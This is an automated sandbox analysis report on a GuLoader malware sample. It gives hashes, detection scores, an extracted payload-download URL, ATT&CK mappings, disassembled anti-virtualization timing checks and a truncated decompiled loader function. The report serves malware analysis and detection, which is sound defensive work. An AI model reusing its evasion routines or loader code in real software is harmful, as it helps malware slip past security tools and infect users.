Play interactive tour

Edit tour

Windows Analysis Report 20211129.exe

Overview

General Information

Sample Name:	20211129.exe
Analysis ID:	532897
MD5:	672587fb175264ef8b45a2b0857f273f
SHA1:	ab7c2f5edf572d5b28d7da50f548d73d49f92b71
SHA256:	c00b66ef61df2012b269bca3e60b301478641292948f1cac579096603ad67f98
Tags:	exeguloadersigned
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

PE / OLE file has an invalid certificate

Contains functionality to call native functions

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

20211129.exe (PID: 456 cmdline: "C:\Users\user\Desktop\20211129.exe" MD5: 672587FB175264EF8B45A2B0857F273F)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=down"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=down"}

Multi AV Scanner detection for submitted file

Show sources

Source: 20211129.exe	Virustotal: Detection: 36%	Perma Link
Source: 20211129.exe	Metadefender: Detection: 21%	Perma Link
Source: 20211129.exe	ReversingLabs: Detection: 51%

Source: 20211129.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=down

Source: 20211129.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 20211129.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 20211129.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 20211129.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 20211129.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 20211129.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 20211129.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: 20211129.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: 20211129.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: 20211129.exe	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: 20211129.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 20211129.exe, 00000000.00000002.776768786.0000000002A40000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenametofrontskrig.exeFE2XK vs 20211129.exe
Source: 20211129.exe, 00000000.00000000.245587033.0000000000425000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenametofrontskrig.exe vs 20211129.exe
Source: 20211129.exe	Binary or memory string: OriginalFilenametofrontskrig.exe vs 20211129.exe

Source: 20211129.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02236BAF	0_2_02236BAF
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0222D9D3	0_2_0222D9D3
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0222BC7B	0_2_0222BC7B
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0222E24E	0_2_0222E24E
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0222525E	0_2_0222525E
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_022336B9	0_2_022336B9
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02234E85	0_2_02234E85
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_022332ED	0_2_022332ED
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_022252EC	0_2_022252EC
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0222D568	0_2_0222D568
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0222C18D	0_2_0222C18D
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_022205CC	0_2_022205CC
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_022343CC	0_2_022343CC

Source: 20211129.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\20211129.exe

Code function: 0_2_0222D9D3 NtAllocateVirtualMemory,

0_2_0222D9D3

Source: C:\Users\user\Desktop\20211129.exe

Process Stats: CPU usage > 98%

Source: 20211129.exe	Virustotal: Detection: 36%
Source: 20211129.exe	Metadefender: Detection: 21%
Source: 20211129.exe	ReversingLabs: Detection: 51%

Source: 20211129.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\20211129.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\20211129.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\20211129.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\20211129.exe

File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

Jump to behavior

Source: classification engine

Classification label: mal80.rans.troj.evad.winEXE@1/0@0/0

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0040C11C pushfd ; iretd	0_2_0040C120
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02222623 push FFFFFF81h; ret	0_2_0222262F
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02225E26 push esp; iretd	0_2_02225E28
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02222231 push ebx; retf	0_2_022222A6
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02220039 pushfd ; retf	0_2_02220050
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02220C65 pushfd ; iretd	0_2_02220C68
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02220052 pushfd ; retf	0_2_02220050
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02220052 pushfd ; retf	0_2_022200B3
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0222D2C5 push ecx; retf	0_2_0222D7DD
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02224BBD push ss; ret	0_2_02224BBE
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02221B91 pushfd ; ret	0_2_02221B95
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02222DCC push edi; iretd	0_2_02222DCD

Source: C:\Users\user\Desktop\20211129.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20211129.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20211129.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\20211129.exe

RDTSC instruction interceptor: First address: 000000000222CB10 second address: 000000000222CB10 instructions: 0x00000000 rdtsc 0x00000002 mov eax, C59FC429h 0x00000007 sub eax, C4E79C3Eh 0x0000000c add eax, 320FDAB5h 0x00000011 sub eax, 32C8029Fh 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F487CD844D4h 0x0000001e lfence 0x00000021 mov edx, D1AF9544h 0x00000026 xor edx, 9043EC23h 0x0000002c sub edx, FB2A8C3Dh 0x00000032 xor edx, 393FED3Eh 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d ret 0x0000003e sub edx, esi 0x00000040 ret 0x00000041 pop ecx 0x00000042 add edi, edx 0x00000044 dec ecx 0x00000045 mov dword ptr [ebp+0000020Ch], ecx 0x0000004b mov ecx, A02E6A25h 0x00000050 add ecx, 63038538h 0x00000056 xor ecx, 9592C6BAh 0x0000005c xor ecx, 96A329E7h 0x00000062 cmp dword ptr [ebp+0000020Ch], ecx 0x00000068 mov ecx, dword ptr [ebp+0000020Ch] 0x0000006e jne 00007F487CD843BFh 0x00000070 mov dword ptr [ebp+00000231h], eax 0x00000076 mov eax, ecx 0x00000078 push eax 0x00000079 mov eax, dword ptr [ebp+00000231h] 0x0000007f call 00007F487CD845FBh 0x00000084 call 00007F487CD844F5h 0x00000089 lfence 0x0000008c mov edx, D1AF9544h 0x00000091 xor edx, 9043EC23h 0x00000097 sub edx, FB2A8C3Dh 0x0000009d xor edx, 393FED3Eh 0x000000a3 mov edx, dword ptr [edx] 0x000000a5 lfence 0x000000a8 ret 0x000000a9 mov esi, edx 0x000000ab pushad 0x000000ac rdtsc

Source: C:\Users\user\Desktop\20211129.exe

Code function: 0_2_0222CB08 rdtsc

0_2_0222CB08

Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02234E85 mov eax, dword ptr fs:[00000030h]	0_2_02234E85
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_022332ED mov eax, dword ptr fs:[00000030h]	0_2_022332ED
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_0222C77D mov eax, dword ptr fs:[00000030h]	0_2_0222C77D
Source: C:\Users\user\Desktop\20211129.exe	Code function: 0_2_02232985 mov eax, dword ptr fs:[00000030h]	0_2_02232985

Source: C:\Users\user\Desktop\20211129.exe

Code function: 0_2_0222CB08 rdtsc

0_2_0222CB08

Source: C:\Users\user\Desktop\20211129.exe

Code function: 0_2_02236BAF RtlAddVectoredExceptionHandler,

0_2_02236BAF

Source: 20211129.exe, 00000000.00000002.775916702.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 20211129.exe, 00000000.00000002.775916702.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: 20211129.exe, 00000000.00000002.775916702.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: 20211129.exe, 00000000.00000002.775916702.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: 20211129.exe, 00000000.00000002.775916702.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	System Information Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
20211129.exe	37%	Virustotal		Browse
20211129.exe	22%	Metadefender		Browse
20211129.exe	51%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.20211129.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File
0.0.20211129.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532897
Start date:	02.12.2021
Start time:	19:35:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	20211129.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.rans.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 46.3% (good quality ratio 24.1%) Quality average: 32.2% Quality standard deviation: 34.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.14253569878617
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	20211129.exe
File size:	156816
MD5:	672587fb175264ef8b45a2b0857f273f
SHA1:	ab7c2f5edf572d5b28d7da50f548d73d49f92b71
SHA256:	c00b66ef61df2012b269bca3e60b301478641292948f1cac579096603ad67f98
SHA512:	67d7444cb44d8b9be7ed2301e64a2368ac21f370b98cbdcdcff895ad35d66e097372c3b50eb5906ef8acc942316a6fe117522988e433660989abaa9caed9076f
SSDEEP:	1536:BUHEm7YNXO6rJiEqawzLDnzf4YIOBFKrf2m6+TFy2rsm1uQBH:BgEm7c+wk7rLDBKH
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...*D.X................. ...0...............0....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401888
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x58F4442A [Mon Apr 17 04:27:22 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b209c8634733456633136bfedc71877a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=affaldsproblemernes@Sisi.tr, CN=Topmargenernes6, OU=Discoplacenta4, O=Pearlings4, L=Tryptone, S=Hydrencephalus4, C=CC
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	12/1/2021 3:02:36 AM 12/1/2022 3:02:36 AM
Subject Chain	E=affaldsproblemernes@Sisi.tr, CN=Topmargenernes6, OU=Discoplacenta4, O=Pearlings4, L=Tryptone, S=Hydrencephalus4, C=CC
Version:	3
Thumbprint MD5:	A09281A46CB4122164B30FB05611CD3F
Thumbprint SHA-1:	75FB258FE049C5BD134BB76066831E5C0A29A387
Thumbprint SHA-256:	8502EA39172E6385A457D26EB0847AE9378028A76658050B270AB02D86DCDB01
Serial:	00

Entrypoint Preview

Instruction
push 004019B8h
call 00007F487C8CE475h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
sahf
xor byte ptr [edx+ecx-42B8711Dh], ah
adc bl, ch
test al, 3Fh
inc esp
add ch, 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
inc edx
push ebp
push edx
dec ecx
inc ecx
dec esp
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add byte ptr [8DDC4E59h], dh
call far 6341h : 6083488Fh
jbe 00007F487C8CE424h
insb
in eax, 19h
cld
call 00007F485E15FFECh
dec esi
mov eax, 22D1BED9h
dec eax
cmp cl, 0000003Ah
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esi
add byte ptr [eax], al
add byte ptr [ecx+00h], cl
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [edi+55h], al
dec esp
dec esi
inc ecx
push edx
inc ebp
add byte ptr [53000B01h], cl
imul esi, dword ptr [edx+69h], 64h
outsb
jnc 00007F487C8CE4BAh
add byte ptr [ecx], bl
add dword ptr [eax], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x219c4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x25000	0x970	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x25000	0x1490
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x234	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x210b4	0x22000	False	0.360753676471	data	5.21959711886	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x23000	0x122c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x25000	0x970	0x1000	False	0.174072265625	data	2.04745900646	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x25840	0x130	data
RT_ICON	0x25558	0x2e8	data
RT_ICON	0x25430	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x25400	0x30	data
RT_VERSION	0x25150	0x2b0	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
LegalCopyright	Union
InternalName	tofrontskrig
FileVersion	4.00
CompanyName	Union
LegalTrademarks	Union
ProductName	Union
ProductVersion	4.00
FileDescription	Union
OriginalFilename	tofrontskrig.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: 20211129.exe PID: 456 Parent PID: 6016

General

Start time:	19:36:09
Start date:	02/12/2021
Path:	C:\Users\user\Desktop\20211129.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\20211129.exe"
Imagebase:	0x400000
File size:	156816 bytes
MD5 hash:	672587FB175264EF8B45A2B0857F273F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 20211129.exe PID: 456 Parent PID: 6016 20211129.exeCOMMON

Executed Functions

Function 0222D9D3, Relevance: 2.0, APIs: 1, Instructions: 543memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(D35DC025), ref: 0222DD96

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e50c5bb474171de5d308bb2a60423222f4184ef78eb3bbd6cac0aa15c216255f
Instruction ID: f82bcefe09540061713bba7bdc7081e3b5d9fc089bd905f18d706c8a0ec67d9c
Opcode Fuzzy Hash: e50c5bb474171de5d308bb2a60423222f4184ef78eb3bbd6cac0aa15c216255f
Instruction Fuzzy Hash: 8ED117300B36316EDB38A9795596BA423D0EF98B44F44299BF78683363DBB24783CD41

Uniqueness

Uniqueness Score: -1.00%

Function 02236BAF, Relevance: 1.7, APIs: 1, Instructions: 235COMMON

Download Yara Rule

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 02237970

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 3f1a26029703913314c86db7d373157f0bc4e6cba3856f95512595270acf5932
Instruction ID: 9ad5686b39b98bcd86468b79fdc38a6c4b0666cd655faffa64cbfdc0c905fc0d
Opcode Fuzzy Hash: 3f1a26029703913314c86db7d373157f0bc4e6cba3856f95512595270acf5932
Instruction Fuzzy Hash: 479145F1624385CFDF76DEA8CD987EA77A2AF49350F11421ADC0A9B358C7709641CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0041C7D4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041C7D4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				signed int _v44;
				void* _v48;
				short _v52;
				short* _v64;
				char _v76;
				short _v84;
				void* _v88;
				short _v92;
				void* _v96;
				intOrPtr _v100;
				short _v104;
				void* _v108;
				void* _v112;
				char _v128;
				short _v132;
				intOrPtr _v136;
				void* _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				char _v168;
				long long _v176;
				char _v184;
				intOrPtr _v192;
				char _v200;
				intOrPtr _v208;
				char _v216;
				intOrPtr _v224;
				char _v232;
				long long _v240;
				char _v248;
				char _v264;
				char* _v272;
				char _v280;
				char _v332;
				signed int _v336;
				signed int _v340;
				void* _v344;
				signed int _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				long long _v368;
				long long _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				char* _t658;
				signed short _t659;
				signed int _t671;
				char* _t675;
				short _t676;
				short _t685;
				short _t695;
				signed int _t704;
				signed int _t707;
				signed int _t708;
				signed int _t712;
				char* _t713;
				signed int _t720;
				signed int _t722;
				signed int _t723;
				signed int _t731;
				signed int _t732;
				signed int _t737;
				signed int _t738;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				char* _t747;
				signed int _t761;
				signed int* _t762;
				signed int _t771;
				char* _t772;
				char* _t776;
				signed int _t780;
				signed int _t797;
				signed int _t802;
				char* _t808;
				char* _t819;
				signed int _t822;
				signed int _t827;
				signed int* _t832;
				signed int _t836;
				signed char _t842;
				signed int _t845;
				char* _t848;
				signed int _t849;
				char* _t853;
				char* _t854;
				signed int _t857;
				signed int _t865;
				char* _t874;
				signed int* _t879;
				short _t882;
				signed int _t883;
				signed int _t885;
				signed int _t887;
				signed int _t889;
				char* _t891;
				short _t892;
				signed int _t897;
				signed int _t899;
				signed int _t901;
				short _t903;
				signed int _t904;
				signed int _t906;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t912;
				signed int _t914;
				signed int _t915;
				signed int _t921;
				signed int _t926;
				char* _t932;
				signed int _t989;
				signed int _t999;
				signed int _t1004;
				signed int _t1010;
				signed int _t1015;
				void* _t1065;
				void* _t1067;
				intOrPtr _t1068;
				void* _t1069;
				void* _t1070;
				void* _t1082;
				long long _t1086;

				_t1068 = _t1067 - 0xc;
				 *[fs:0x0] = _t1068;
				L00401540();
				_v16 = _t1068;
				_v12 = 0x401260;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t1065);
				_push(2);
				_push(0x4029ac);
				_push( &_v76);
				L0040186A();
				_v272 = L"Hjortens";
